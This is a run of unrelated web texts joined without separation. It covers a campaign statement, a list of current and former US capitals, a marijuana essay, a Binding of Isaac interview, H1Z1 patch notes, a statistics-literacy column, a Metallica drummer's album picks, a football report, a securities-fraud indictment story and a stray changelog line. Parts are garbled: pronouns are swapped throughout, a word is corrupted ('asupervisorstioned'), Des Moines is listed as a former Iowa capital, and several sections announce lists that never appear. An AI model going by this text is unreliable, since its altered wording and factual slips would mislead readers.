“ When Republicans controlled the White House , their trickle-down approach drove our economy to the brink of a collapse , ” Urena said . “ After President Obama was elected , Republicans made it their number one goal to block them at every turn . That unprecedented obstruction these last eight years is their legacy , and the American people should reject it by electing Hillary Clinton to build on President Obama 's success so we can all grow and succeed together . ”
Washington , D.C. has been the federal capital city of the United States since 1802 . Each U.S. state has its own capital city , as do many of its insular areas . Historically , most states have not changed their capital city since becoming a state , but the capital cities of their respective preceding colonies , territories , kingdoms , and republics typically changed multiple times . There have also been other governments within the current borders of the United States with their own capitals , such as the Republic of Texas , Native American nations , and other unrecognized governments .
Capitals of the United States [ edit ]
State capitals [ edit ]
The 17 states ( purple ) whose capital is also that state 's largest city by population , as of 2016 estimates .
The dates listed in the following table indicate the year in which the city started to continuously serve as the state 's sole capital . Most states have changed their capital city at least once . In the case of the thirteen original states , `` statehood '' in the table refers to date of ratification of the United States Constitution .
Insular area capitals [ edit ]
An insular area is a United States territory that is neither a part of one of the fifty states nor a part of the District of Columbia , the nation 's federal district . Those insular areas with territorial capitals are listed below .
Former colonial , territorial , and state capitals [ edit ]
For the states with more than one former capital , they are listed in chronological order . [ citation needed ]
Alabama : Cahaba
Alaska : Sitka ( territorial )
Arizona : Messila ( Confederate territory , today in New Mexico ) , Fort Whipple , Prescott , Tuscon ( territorial )
Arkansas : Arkansas Post ( territorial )
California : Monterey , San Jose , Vallejo , Benicia
Connecticut : New Haven
Delaware : New Castle ( colonial ) , Wilmington , Lewes , New Castle
Georgia : Milledgeville
Hawaii : see below
Idaho : Lewiston ( territorial )
Illinois : Kaskaskia , Vandalia
Indiana : Vincennes ( territorial ) , Corydon
Iowa : Des Moines
Kansas : Lecompton
Louisiana : Mobile , Biloxi , New Orleans ( French colonial ) , St. Francisville ( West Florida ) , Donaldsonville , Opelousas , Shreveport
Maine : Portland
Michigan : Detroit
Mississippi : Washington
Missouri : St. Louis ( Louisiana territory ) , St. Charles
Montana : Bannack , Virginia City ( territorial )
Nebraska : Omaha ( territorial )
New Jersey : Perth Amboy ( colonial ) , Elizabethtown ( territorial )
New York : Kingston , Poughkeepsie , New York ( city )
North Carolina : Charleston ( Carolina province ) , Edenton ( colonial ) , New Bern , Fayetteville
North Dakota : Yankton ( Dakota territory )
Ohio : Chillicothe , Zanesville , Chillicothe
Oklahoma : Guthrie
Oregon : Oregon City
Pennsylvania : Philadelphia , Lancaster
Rhode Island : Newport
South Carolina : Charleston
South Dakota : Yankton , Bismarck ( Dakota territory )
Texas : see below
Utah : Fillmore ( territorial )
Vermont : Windsor
Virginia : Jamestown ( colonial ) , Williamsburg
West Virginia : Wheeling
Wisconsin : Belmont
Former national capitals [ edit ]
Kingdom and Republic of Hawaii [ edit ]
Prior to becoming a territory of the United States in 1898 , Hawaii was an independent country . Five sites served as its capital :
Republic of Texas [ edit ]
Before joining the United States under the Texas Annexation in 1845 , Texas was an independent nation known as the Republic of Texas . Seven cities served as its capital :
Native American capitals [ edit ]
Some Native American tribes , in particular the Five Civilized Tribes , organized their states with constitutions and capitals in Western style . Others , like the Iroquois , had long-standing , pre-Columbian traditions of a 'capitol ' longhouse where wampum and council fires were maintained with special status . Since they did business with the U.S. Federal Government , these capitals can be seen as officially recognized in some sense .
Cherokee Nation [ edit ]
New Echota , now near Calhoun , Georgia was founded in 1825 , realizing the dream and plans of Cherokee Chief Major Ridge . Major Ridge chose the site because of its centrality in the historic Cherokee Nation which spanned parts of Georgia , North Carolina , Tennessee and Alabama , and because it was near the confluence of the Conasauga and Coosawattee rivers . The town 's layout was partly inspired by Ridge 's many visits to Washington D.C. and to Baltimore , but also invoked traditional themes of the Southeastern ceremonial complex . Complete with the Council House , Supreme Court , Cherokee syllabary printing press , and the houses of several of the Nation 's constitutional officers , New Echota served as the capital until 1832 when the state of Georgia outlawed Native American assembly in an attempt to undermine the Nation . Thousands of Cherokee would gather in New Echota for the annual National Councils , camping along the nearby rivers and holding long stomp dances in the park-like woods that were typical of many Southeastern Native American settlements . [ 6 ]
The Cherokee National council grounds were moved to Red Clay , Tennessee on the Georgia state line in order to evade the Georgia state militia . The log cabins , limestone springs and park-like woods of Red Clay served as the capital until the Cherokee Nation was removed to Indian Territory ( Oklahoma ) on the Trail of Tears . [ 6 ]
Tahlequah , in present-day Oklahoma , served as the capital of the original Cherokee Nation after Removal . After the Civil War , a turbulent period for the Nation which was involved in its own civil war resulting from pervasive anger and disagreements over removal from Georgia , the Cherokee Nation built a new National Capitol in Tahlequah out of brick . The building served as the capitol until 1907 , when the Dawes Act finally dissolved the Cherokee Nation and Tahlequah became the county seat of Cherokee County , Oklahoma . The Cherokee National government was re-established in 1938 and Tahlequah remains the capital of the modern Cherokee Nation ; it is also the capital of the United Keetoowah Band of Cherokee Indians .
Approximately four to eight hundred Cherokees escaped removal because they lived on a separated tract , purchased later with the help of Confederate Colonel William Holland Thomas , along the Oconaluftee river deep in the Smoky Mountains of North Carolina . Some Cherokees fleeing the Federal Army sent for the `` round up , '' fled to the remote settlements separated from the rest of the Cherokee Territory in Georgia and North Carolina in order to remain in their homeland . [ 7 ] In the 20th century , their descendants organized as the Eastern Band of Cherokee Indians ; its capital is at Cherokee , North Carolina , in the tribally-controlled Qualla Boundary .
Muscogee Creek Nation [ edit ]
Hot Springs , Arkansas c. 1837–1866
After Removal from their Alabama-Georgia homeland , the Creek national government met near Hot Springs which was then part of their new territory as prescribed in the Treaty of Cusseta . However , the Union forced the Creeks to cede over three million acres ( half of their land ) of what is now Arkansas , after some Creeks fought with the Confederacy in the American Civil War . [ 8 ]
Served as the National capital after the American Civil War . It was probably named after Ocmulgee , on the Ocmulgee river in Macon , a principle Coosa and later Creek town built with mounds and functioning as part of the Southeastern ceremonial complex . However , there were other traditional Creek `` mother-towns '' before removal . The Ocmulgee mounds were ceded illegally in 1821 with the Treaty of Indian Springs .
Iroquois Confederacy [ edit ]
Onondaga ( Onondaga privilege c. 1450–present )
The Iroquois Confederacy or Haudenosaunee , which means `` People of the Longhouse , '' was an alliance between the Five and later Six-Nations of Iroquoian language and culture of upstate New York . [ 9 ] These include the Seneca , Cayuga , Onondaga , Oneida , Mohawk , and , after 1722 , the Tuscarora Nations . Since the Confederacy 's formation around 1450 , the Onondaga Nation has held privilege of hosting the Iroquois Grand Council and the status of Keepers of the Fire and the Wampum —which they still do at the official Longhouse on the Onondaga Reservation . [ 10 ] Now spread over reservations in New York and Ontario , the Six Nations of the Haudenosaunee preserve this arrangement to this day in what they claim to be the `` world 's oldest representative democracy . `` [ 11 ]
Seneca Nation of Indians [ edit ]
The Seneca Nation republic was founded in 1848 and has two capitals that rotate responsibilities every two years . Jimerson Town was founded in the 1960s following the formation of the Allegheny Reservoir . The Senecas also have an administrative longhouse in Steamburg but do not consider that location to be a capital .
Navajo Nation [ edit ]
Window Rock ( Navajo : Tségháhoodzání ) , Arizona , is a small city that serves as the seat of government and capital of the Navajo Nation ( 1936–present ) , the largest territory of a sovereign Native American nation in North America . It lies within the boundaries of the St. Michaels Chapter , adjacent to the Arizona and New Mexico state line . Window Rock hosts the Navajo Nation governmental campus which contains the Navajo Nation Council , Navajo Nation Supreme Court , the offices of the Navajo Nation President and Vice President , and many Navajo government buildings .
Unrecognized national capitals [ edit ]
There have been a handful of nations within the current borders of the United States which were never officially recognized as legally independent sovereign entities ; however , these nations did have de facto control over their respective regions during their existence .
Vermont Republic [ edit ]
Before joining the United States as the fourteenth state , Vermont was an independent republic known as the Vermont Republic . Two cities served as the capital of the Republic :
Westminster , 1777
Windsor , 1777–1791
The current capital of the State of Vermont is Montpelier .
State of Franklin [ edit ]
The State of Franklin was an autonomous , secessionist United States territory created , not long after the end of the American Revolution , from territory that later was ceded by North Carolina to the federal government . Franklin 's territory later became part of the state of Tennessee . Franklin was never officially admitted into the Union of the United States and existed for only four years .
State of Muskogee [ edit ]
The State of Muskogee was a short-lived Native American state in Florida , created by the Englishman William Augustus Bowles , who was its `` Director General '' , author of its Constitution and designer of its flag . [ 12 ] It consisted of several tribes of Creeks and Seminoles . It existed from 1799 to 1803 . It had one capital :
Republic of West Florida [ edit ]
The Republic of West Florida was a short-lived republic involving the area known today as Louisiana 's Florida Parishes — at the time the westernmost portion of Spanish West Florida . The area was soon seized by the United States under President James Madison and incorporated into the Territory of Orleans . None of the Republic of West Florida was within the boundaries of modern Florida .
Republic of Indian Stream [ edit ]
The Republic of Indian Stream was an unrecognized independent nation within the present state of New Hampshire .
California Republic [ edit ]
Before being annexed by the United States in 1848 ( following the Mexican–American War ) , a small portion of north-central California declared itself the California Republic , in an act of independence from Mexico , in 1846 ( see Bear Flag Revolt ) . The republic only existed a month before it disbanded itself , to join the advancing American army and therefore became part of the United States .
The very short-lived California Republic was never recognized by the United States , Mexico or any other nation . There was one de facto capital of the California Republic :
Sonoma , 1846
Confederate States [ edit ]
The Confederate States of America ( C.S.A . ) had two capitals during its existence . The first capital was established February 4 , 1861 , in Montgomery , Alabama , and remained there until it was moved to Richmond , Virginia , on May 29 , 1861 , after Virginia seceded on May 23 .
The individual state capitals remained the same in the Confederacy as they had been in the Union ( U.S.A. ) , although as the advancing Union Army used those cities for military districts , some of the Confederate governments were relocated or moved out of state , traveling along with secessionist armies .
Montgomery , February 4 , 1861 – May 29 , 1861
Richmond , May 29 , 1861 – April 3 , 1865
Historical state , colonial , and territorial capitals [ edit ]
Most of the original Thirteen Colonies had their capitals occupied or attacked by the British during the American Revolutionary War . State governments operated where and as they could . The City of New York was occupied by British troops from 1776 to 1783 . A similar situation occurred during the War of 1812 , during the American Civil War in many Confederate states , and during the Pueblo Revolt of 1680–1692 in New Mexico .
Twenty-two state capitals have been a capital longer than their state has been a state , since they served as the capital of a predecessor territory , colony , or republic . Boston , Massachusetts , has been a capital city since 1630 ; it is the oldest continuously-running capital in the United States . Santa Fe , New Mexico , is the oldest capital city , having become capital in 1610 and interrupted only by the asupervisorstioned Pueblo Revolt . An even older Spanish city , St. Augustine , Florida , served as a colonial capital from 1565 until about 1820 , more than 250 years .
The table below includes the following information :
See also [ edit ]
Notes [ edit ]
References [ edit ]
Further reading [ edit ]
This is a big week for weed , with Colorado becoming the first state in the nation to have legal recreational marijuana . All across the Centennial State , fluffy buds twinkling with crystals are being loaded into swirled glass pipes and sparked in celebration . There is no pretense of medicine . People are getting stoned , as they have for years , but now it 's legal under state law .
Coloradans and the rest of Marijuana America are smoking some of the best nugs in the history of ever . This is pot that 's been lab-tested , groomed , pruned and doled out in a sterile room . This is the kindest bud , a high point for weed . But it 's a damn shame no one smokes schwag anymore .
I 'm talking about dirt weed , the dried-out marijuana that 's flattened and trucked in large bricks . I 'm talking about the weed a lot of people over 30 grew up with . This is the bud of Bob Dylan 's `` Rainy Day Women # 12 & 35 . '' This is Black Sabbath 's `` Sweet Leaf , '' Neil Young 's `` Roll Another Number ( For the Road ) . '' This is the Doobie Brothers , dude .
Binding Of Isaac creator Edmund McMillen does n't like the word ‘ addiction ' . But I do . It 's the only word I can use to describe my frankly irrational gaming behaviour over the last seven months . The Binding Of Isaac Rebirth has taken over . I 'm more at home in the Basement or the Cellar than I am in my new flat . My thumbs twang with the memory of the repetitive strain injury ( RSIsaac ) from long winter nights spent firing tears at furious faeces . Versions of the Four Horsemen so noisily disturbing that I heard their cries long after I had switched off the PS4 . And do n't even start me on Mega Satan . I wo n't stop .
One man is to blame and when I speak to him , it suddenly all makes horrible , horrible sense . ” I made this game completely for me , ” creator and designer Edmund McMillen quickly admits , having somehow agreed to speak to me about my problem .
For those who have n't had the pleasure , Isaac is the young son of a fanatical Christian single mother who believes after a message from God that they must take the life of their child . They end up in the basement of their house , battling the demons who reside there with the only weapon they have , their tears . You can see why Nintendo initially said thanks but no thanks .
Rooms of living faeces , evil clones , scrabbling spiders and fiendish bosses await . It 's a simple enough set up . Clear the room , the doors unlock , repeat . Permadeath is the order of the day . Each enemy damages you half a heart ( initially ) and the juggling of items such as bombs , keys and trinkets mean you 'll never play the same game twice . It 's a world of procedurally generated darkness that will drive you slowly mad as you discover how far the demonic rabbit hole actually goes . Spoiler ? Far . It goes far .
“ I think the thing that keeps me coming back is that I play it as well , ” ponders McMillen when I ask why he 's still making content and new versions of the game ( Rebirth has just released on Xbox One and the New 3DS ) . “ I think also my wife , like you , plays religiously and it 's fun to watch them play . That was one of the reasons why I added co-op so when they were playing I could just pop in and mess around. ” This is n't just a game they created , this is a game McMillen still plays and has updated to suit theirs tastes .
And initially it was only for their tastes . “ I thought only I would like it ! ” laughs McMillen . “ It seemed too difficult , it seemed too unforgiving . That was kind of the initial response when it came out . We had people like ‘ Oh I like Meat Boy , so I 'm just going to buy this ' but there was a lot of push back . It takes a little bit to hook ya . For it to fully unfold ... ”
Unfolding is the key to Isaac . Like one of those beautiful Japanese flower teas but with faeces , vomit and dead children . Initially there are only five floors to finish . A descent through the floors ( each with its own boss ) culminates in a battle with Mom - a stomping , enemy-spawning behemoth with high heels - and beating even that feels like a towering achievement . Dependent on your pick-ups , by that point you can be armed with up to twelve hearts instead of your starting three , have flaming tears , be leaving behind a trail of tar , have a familiar that fires lasers ... or perhaps you 'll be steering one giant tear while riding a pony you won from a toxic horseman .
And while beating Mom might be the end of the game for you it 's not the true end . That 's far , far away . “ The first time you kill Mom is just the first unlocking of the game , ” confirms McMillen . “ And I designed it in a way that it would keep unfolding the more and more you play . ”
Beyond Mom lies two levels of Utero and the chance to defeat Mom 's Heart , a spewing bullet hell of a Boss who spawns laser firing eyes . And then ? A chance to ascend to The Cathedral to tackle an angelic version of Isaac himself , or the ability to clamber deeper below and take on Satan . And then ? Collecting six pieces of a Polaroid . And then ? The transformation of Mom 's Heart into It Lives . Two pieces of a key . The Blue Baby . The Lamb . Mega Satan . The Lost . How deep can you go ? How long can you survive with what you 've got ? Be afraid . This game is dangerous . Die and you 're right back at the beginning . Live and you might just watch the credits after one of sixteen endings , roaring triumphantly .
“ You need the understanding that this game does n't play like other games , ” explains McMillen . “ You 're meant to lose . The excitement is in the next run . Not in the initial . It 's always the next run that you 're excited about because of the possibilities that are endless. ” And here 's where the addiction lies . It 's where my thumbs twitch at even the mention of Isaac . Just one more go . Pure addiction .
“ I try not to use the word addiction ! , ” howls McMillen . “ My goal was never to make a game that was addictive ! Like I 'd hate to think that people are staying up endless hours of the night playing this game . But for me - and it sounds narcissistic at this point - I would much rather play Isaac than almost any other game out there . There is not much that compels me and I feel , to some extent , spoiled by what I have done because I have made something that I can enjoy - and if I enjoy it enough then I can enjoy it forever . ”
These are truly terrifying words . I can see my future from here . A gaping maw of Isaac looming to swallow me whole . I ca n't be a games journalist if I do n't play any more games . I 'm a shark . I was never meant to stop . How can a glorified twin stick shooter do this to me ? “ That was my kind of goal , ” they continue , oblivious to my plight . “ Like I want a game that could almost be a forever game . This evergreen game that you can keep coming back to , much like Pacman . Something that has random generation that can keep you going forever . For me it 's just that I 'd rather just do that . It just seems bite-sized but endless . ”
When I ask if they are ashamed of what they have done to me , they pause . `` To some degree , yes . I mean there 's a certain responsibility of the designer when doing it . I mean , I could say that it could have been much worse . I could have been , y'know , charging you for lives or something along those lines which is way more despicable . Ok , I realise that there 's a slot machine aspect of the game that 's very strong and the random generation definitely kinda gets you going , but I feel like ‘ addiction ' had more negative connotations . ‘ Compelling ' has less . I do n't want people to just waste their lives playing something ! It does n't make me feel better to know that people are really pouring five hundred hours into the game . But , I did make it so it goes on forever ... ”
Speaking of forever , McMillen is currently working on the aptly titled Afterbirth DLC , with more items , more bosses , more trinkets , and absolutely no consideration for the thumbs or professional lives of its players . He 's been taking feedback from the community too . Enlisting help to add to Isaac 's random arsenal with new items such as Pokeball style throwables that trap enemies for use against foes in another room . But McMillen 's having trouble stopping adding content .
“ We 're pretty close [ to finishing ] ” , they ponder . “ I just got a message from Tyrone that says ‘ I think we can do 30 more items . ' I kind of went in a bit crazy with a hundred plus items , and then there were ten community items that I put in and I was like ‘ ok this is good ' . But then one aspect of the game is that when you have new characters you have new places for unlocks , and I 'm a stickler when it comes to reward . I want there to be a reward in the game for everything you do , and again the game 's based around expansion the more you play . So if there are new things to complete , then each character has to have some kind of unlockable item per thing . And if I 'm adding a bunch of those things then maybe thirty or so items are just going to be locked , so that 's no fun . I think we can do more of those . The goal is still summer . With Afterbirth , I 'm excited . I 'm excited to play it . ”
I 'm looking at the arrival of Afterbirth with a burning desire and I 've been longing disturbingly over the Binding of Isaac official site where there are gifs of new items . Now that I 've unlocked all the endings by beating the last enemy of the game - Mega Satan , who despite sounding comedic is anything but - I want more . More than what I 'm left with . Which is the impossible task of completing the game with a character called the Lost . One that does n't have a single heart of health . Here is where a deeper madness lies but it 's all part of McMillen 's game ethos . “ I feel like difficult games are important , especially nowadays when everything holds your hand or you can even pay to complete , ” they ponder . “ I feel like it kind of really moves away from what games are . People do n't play competitive soccer because they get to win . You got ta play hard . Then it feels good when you win . And I feel like that it 's that same basic thing . No one runs a marathon because everybody wins and you finish it instantly because it 's easy . You 're compelled to do something difficult because it feels really good when you finally do it . And it 's missing from a lot of games . ”
Missing ? Games ? I am missing other games . After the defeat of Mega Satan , I think Isaac can rest for a while . Stay in the dark . There are still some challenges to do , but when Afterbirth arrives , I 'll catch up . Perhaps it 's time to leave the basement and step into the sunshine . Y'know . Just for a little while . Oh , you 're just starting ? Good luck . You 'll need it .
H1Z1 : King of the Kill Producer Notes for May 18th , 2016
Hi everyone , and thanks for taking the time to give this a read . I know that many of you have poured countless hours into H1Z1 and all of the developers thank you for that .
This will be one of the largest updates we 've executed this year and it contains a lot of great changes . Some of the larger notes are detailed below , but this update also brings with it every change that has been on the Test server for the last couple of weeks . You can expect to see a full list of patch notes on Friday .
Ignition is Going Live FRIDAY !
Really excited to share that Ignition will be launching onto our Live servers this coming Friday , May 20th . With feedback from the public Test server runs and many , many internal play tests , we have put a lot of work into tuning this new mode to make it as fun as possible . We think Ignition has turned out great . It truly captures all of the tension and excitement of Battle Royale while encouraging players to engage a new perspective and balance getting to the correct location while also searching for gear , and skillfully outliving the competition .
For those of you not in the know , rather than parachuting into the action , Ignition starts each player off with their very own ATV and a pack of explosives strapped to their body . To stay in the game , players need to quickly gear up , jump on their ATV , and gun it to the safe zone before the time runs out and your explosives go BOOM !
Two of my favorite streamers , OPscT and AngryPug will be here in studio to livestream the new mode . Be sure to tune into the King of the Kill Twitch channel at 2pm PST this Friday , May 20 to see Ops and Pug play the new mode and share some giveaways .
A few tips here for you to help you find some early success .
As you descend into the arena on your ATV , turn left or right to orient yourself in the direction that you want to head , this way you can set off as soon as you touch the ground .
Be very aware of the safe zone locations ! You will see a helicopter hovering over the safe zones , so look for these to help you find your way . The ground will be clearly marked for you once you make it . Red means you are not safe , green means you are .
Do n't leave getting to the safe zone to the last minute . There is a real balance between gearing up , looting , and getting to a safe zone . If you are outside of the safe zone when the timer hits zero , it is game over for you , so do n't let that happen .
Once time expires , you have to remain in the ring for 30 seconds . If you slip outside of the ring , you explode and are knocked out of the match .
Look for the special airdrops at the end of the ring locks . They may contain a loaded-up off-roader to help get you to the next safe zone and give you the extra advantage you may need to get the win .
Small UI Flow Change
In order to make selection of your preferred game mode or type more clear , we made a small change to the UI flow . The classic server select screen should be thought of as a game select screen . Remember to filter down to your region at the top , then just pick the game that you want to play .
Battle Royale
Battle Royale Team ( 2 or 5 )
Battle Royale : Zombies
Ignition
Skirmish ( when available )
The Battle Royale button has been removed . A lot of people use that button to join a game , but it is really unnecessary and just confusing now that there are various modes to choose from . Just pick the game you want to play and click the “ Join Game ” button .
At the end of a match , we removed the “ Play Again ” button . It did n't do what you expect it to do , and will be different in the future with a whole new flow there . So we simplified it for now and there will be an “ Exit to Main ” button in the lower right that takes you back to the game select screen where you can pick a game and join right into it .
Team Games
Ignition is not the only change coming to King of the Kill this week . A number of improvements have gone in to help the team experience .
We have added an always on outline that is rendered around each character on your team . This is visible through objects , walls , and other obstructions . Just Survive players take note that this will also apply to groups in Just Survive . So if you are grouped up you will be able to see those people in your group .
We fixed up some bugs that were resulting in teams getting split up and put into different games . This is reliable again and you should count on ending up in the same game as a team . If this ends up happening to you , please send some info over so we can check it out .
Those changes will be on Live with Ignition . There is one more change working its way through to help with team play . That is an option to allow you to enter a 5-man game with a team that is less than 5 . There will be an option to auto-fill or not auto-fill the rest of your group to make a 5-man team . If you want to go in as a 3-man team into the 5-man game , you will be able to do that .
Sync 'd Match Starts
I mentioned this last week and you will see changes in the Live environment this Friday . Players now all begin at the same time at the beginning of a match in both Battle Royale and Ignition . I saw some concern over sitting and waiting on people with slow machines . This does have a time cap , initially set to 45 seconds , where it will start the match and stragglers will be at a disadvantage in starting behind the others . In the majority of instances , the game will start prior to that time cap . Our data shows that more than 90 % of all players load faster than 45 seconds .
Rewards
A few changes to rewards are coming in this update as well .
First , all match rewards are being updated . There will be all new items to earn by doing well in a match .
Additionally , rewards in the Skirmish are going to be distributed differently to dis-incentivize teaming . You will now receive a loot bag drop , just like a crate drop , for spending time in the game . Each reward in the bag should be unique , until you have earned them , all of course .
As a reminder , teaming or colluding of any kind is prohibited . We are constantly monitoring these games and if you are caught breaking these rules , we will take action on your account . This is looked at on a case by case basis , but that action can range from a suspension to an all-out account ban . It is n't worth it ; teaming ruins the game for everyone else . Do n't do it . If you see some suspected cheating , please report the instance to h1z1cheater @ daybreakgames.com .
Forced Scope
I know this has been a topic of discussion since we first talked about it . This is n't quite ready to go Live yet , but let me provide some context here . Some changes will go in that not all people will agree with ; this is one of them . King of the Kill has a lot of medium to long range encounters given the nature of the experience and the design of the map . Currently the scoped weapons are too easy and forgiving from long range . We will be forcing a scoped view to add a bit of a trade-off to the power of the weapon . If you are going to get the advantage of the scope , then you lose some of your peripheral vision . It is a trade-off for you to decide on and balance as you are playing the game .
Recent Bug Fixes
Bombing run tuning so the area is not filled with bombs . I mentioned this in my last update and it will be Live this Friday .
Jumping and entering a vehicle could result in a crazy shaky character in the vehicle . We removed this bug , so expect your character to sit nicely .
Seat swapping is now fixed . May that exploit be forever dead .
That 's it for now folks , as always feedback is appreciated !
How can global warming be real when there 's so much snow ? ''
Hearing that question — repeatedly — this past February drove Joseph Romm nuts . A massive snowstorm had buried Washington , DC , and all across the capital , politicians and pundits who dispute the existence of climate change were cackling . The family of Oklahoma senator Jim Inhofe built an igloo near the Capitol and put up a sign reading `` Al Gore 's New Home '' . The planet ca n't be warming , they said ; look at all this white stuff !
Romm — a physicist and climate expert with the Center for American Progress — spent a week explaining to reporters why this line of reasoning is so wrong . Climate change , they said , is all about trend lines . You do n't observe it by looking out the window but by analyzing decades ' worth of data . Of course , snowstorm spin is possible only if the public ( and journalists ) are statistically illiterate . `` A lot of this is counterintuitive , '' Romm admits .
Statistics is hard . But that 's not just an issue of individual understanding ; it 's also becoming one of the nation 's biggest political problems . We live in a world where the thorniest policy issues increasingly boil down to arguments over what the data mean . If you do n't understand statistics , you do n't know what 's going on — and you ca n't tell when you 're being lied to . Statistics should now be a core part of general education . You should n't finish high school without understanding it reasonably well — as well , say , as you can compose an essay .
Consider the economy : Is it improving or not ? That 's a statistical question . You ca n't actually measure the entire economy , so analysts sample chunks of it — they take a slice here and a slice there and try to piece together a representative story . One metric that 's frequently touted is same-store sales growth , a comparison of how much each store in a big retail chain is selling compared with a year ago . It 's been trending upward , which has financial pundits excited .
Problem is , to calculate that stat , economists remove stores that have closed from their sample . As New York University statistician Kaiser Fung points out , that makes the chains look healthier than they might really be . Does this methodological issue matter ? Absolutely : When politicians see economic numbers pointing upward , they 're less inclined to fund stimulus programs .
Or take the raging debate over childhood vaccination , where well-intentioned parents have drawn disastrous conclusions from anecdotal information . Activists propagate horror stories of children who seemed fine one day , got vaccinated , and then developed autism . Of course , as anyone with any exposure to statistics knows , correlation is not causation . And individual stories do n't prove anything ; when you examine data on the millions of vaccinated kids , even the correlation vanishes .
There are oodles of other examples of how our inability to grasp statistics — and the mother of it all , probability — makes us believe stupid things . Gamblers think their number is more likely to come up this time because it did n't come up last time . Political polls are touted by the media even when their samples are laughably skewed . ( This issue breaks left and right , by the way . Intellectually serious skeptics of anthropogenic climate change argue that the statistical case is weak — that Al Gore and their fellow travelers employ dubious techniques to sample and crunch global temperatures . )
Granted , thinking statistically is tricky . We like to construct simple cause-and-effect stories to explain the world as we experience it . `` You need to train in this way of thinking . It 's not easy , '' says John Allen Paulos , a Temple University mathematician .
That 's precisely the point . We often say , rightly , that literacy is crucial to public life : If you ca n't write , you ca n't think . The same is now true in math . Statistics is the new grammar .
Email clive @ clivethompson.net .
METALLICA drummer Lars Ulrich will dedicate this weekend 's episode of their Apple Music Beats 1 radio show `` It 's Electric '' to their fifteen favorite heavy metal and hard rock records of all time .
The list , which they initially prepared for Rolling Stone magazine , covers a wide spectrum of styles , from the Satanic lyricism of MERCYFUL FATE 's `` Melissa '' to the politically charged rap-metal sounds of RAGE AGAINST THE MACHINE 's `` The Battle Of Los Angeles '' .
`` For each artist that 's part of my ultimate metal or hard-rock albums , I went for what you would call the definitive moment in their catalogue , '' Ulrich told Rolling Stone . `` And for a lot of these bands , they went through a kind of evolution , a kind of growth and a lot of them have a lot of great records . So what I picked is a combination of what that album represents from the artist and what impact it had on me . ''
Lars Ulrich 's Top 15 metal and hard rock albums , presented in alphabetical order .
* AC/DC - `` Let There Be Rock '' ( 1977 )
* ALICE IN CHAINS - `` Dirt '' ( 1992 )
* BLACK SABBATH - `` Sabotage '' ( 1975 )
* BLUE ÖYSTER CULT - `` On Your Feet Or On Your Knees '' ( 1975 )
* DEEP PURPLE - `` Made in Japan '' ( 1972 )
* DIAMOND HEAD - `` Lightning To The Nations '' ( 1980 )
* GUNS N ' ROSES - `` aPPETITE FOR dESTRUCTION '' ( 1987 )
* IRON MAIDEN - `` The Number Of The Beast '' ( 1982 )
* JUDAS PRIEST - `` Unleashed In The East '' ( 1979 )
* MERCYFUL FATE - `` Melissa '' ( 1983 )
* MOTÖRHEAD - `` Overkill '' ( 1979 )
* RAGE AGAINST THE MACHINE - `` The Battle Of Los Angeles '' ( 1999 )
* SYSTEM OF A DOWN - `` Toxicity '' ( 2001 )
* UFO - `` Strangers In The Night '' ( 1979 )
* WARRIOR SOUL - `` The Space Age Playboys '' ( 1994 )
You can read Ulrich 's commentary on each of their fifteen picks at RollingStone.com .
METALLICA 's latest album , `` Hardwired ... To Self-Destruct '' , came out last November , eight years after `` Death Magnetic '' .
METALLICA is currently on a short break from its first North American tour in more than seven years , which resumes on July 5 in Orlando , Florida .
This tour marks the first time that METALLICA has offered `` enhanced '' or `` VIP '' experiences for fans , with some willing to cough up as much as $ 2,500 for personal meetings , photos and autographs from the group .
A pre-season friendly between Hearts and Dinamo Bucharest is not the most predictable source of animosity between supporters , but the visitors showed they were in no mood for a tame exhibition match .
With the game being played in the small village of Leigh , Lancashire , there were only 300 people who decided to pay the £10 entry for the game , which would perhaps only interest the most loyal football fans .
But what followed simply could not have been written in the script .
Join Independent Minds For exclusive articles , events and an advertising-free read for just £5.99 €6.99 $ 9.99 a month Get the best of The Independent With an Independent Minds subscription for just £5.99 €6.99 $ 9.99 a month Get the best of The Independent Without the ads – for just £5.99 €6.99 $ 9.99 a month
The change in venue seemed to annoy those who turned up to view the game , with the Leigh Harriers athletics ground deemed not fit for purpose after a recent shot put event , and kick-off was half an hour later as a result .
At half-time , the Dinamo supporters allegedly unfurled banners and began to throw beer cans and fire crackers onto the pitch . Stewards eventually removed the banners , and forced the supporters out of the venue , although some attempted to climb the fence to get back into the ground .
The madness was far from over , however , when the referee awarded a corner in favour of the Scottish league side . Dinamo captain Laurentiu Rus was so incensed at the decision that they ran 15 yards and pushed the official over , and when back to their feet , swiftly brandished a red card .
Rus then refused to leave the pitch , and when they did finally accept their marching orders , Dinamo bizarrely threw on a substitution . The referee ordered the player back to the dugout , and despite the incredible events that unfolded , Hearts did eventually win 2-1 .
Needless to say , they wo n't be inviting the Romanians back again .
Keep up to date with all the latest news with expert comment and analysis from our award-winning writers
CLEVELAND , Ohio -- A Chagrin Falls financial adviser was indicted this week on charges that they participated in a scheme to defraud at least 100 investors of more than $ 15 million , federal prosecutors said .
Larry Werbel , owner of Evolution Partners Wealth Management , was one of several brokers who recruited investors for shares of a shell company called VgTel Inc. , with the promise of high dividends , according to a news release from the U.S. Attorney 's Office for the Southern District of New York . In reality , the shares were being sold and bought by companies that the accused schemers owned in an effort to artificially inflate the price , the release states .
Prosecutors say of the $ 15 million invested , more than $ 9 million went into the pockets of those involved in the scheme . Werbel found investors and pushed them to buy $ 3 million in shares for VgTel , prosecutors claim . In return , they received more than $ 300,000 in kickbacks , the news release states .
The FBI arrested Werbel , 67 , at their home in Solon on Wednesday . They were released after appearing in front of Magistrate Judge Greg White in Cleveland . Their bond is set at $ 100,000 , and they must post 10 percent of it by Monday .
They are charged with conspiracy to commit securities fraud , securities fraud , conspiracy to commit wire fraud , wire fraud , investment adviser fraud and making false statements to federal officers .
Scott Matasar , one of Werbel 's attorneys , said Friday that their client `` disputes the allegations against them in the indictment and looks forward to the opportunity to defend himself . ''
The scheme 's mastermind , according to prosecutors , was Edward Durante , who was arrested in Germany and extradited to the U.S. on Dec. 18 . Durante , who federal officials say goes by five aliases , was convicted of securities fraud in 2001 , and the investors who gave money in the recent scheme were not made aware of this , the news release states .
In addition to Durante and Werbel , brokers in New Jersey , New York and Nevada were indicted in the scheme . Two have pleaded guilty .
The U.S. Securities and Exchange Commission has also filed a civil suit against Werbel , Durante and the other co-defendants in the criminal case , prosecutors said in the release .
Werbel also has claims pending against them in front of the Financial Industry Regulatory Authority . John Chapman , a Cleveland attorney representing two people that they said lost a combined $ 750,000 to Werbel , said `` a lot of people put their trust in them and relied on them to take care of their money . ''
Click here to read the indictment on a mobile device .
* Updated * to reflect modifications to the ORM ( No “ Model ” suffix ; fractured in Types , Functions , Relations )
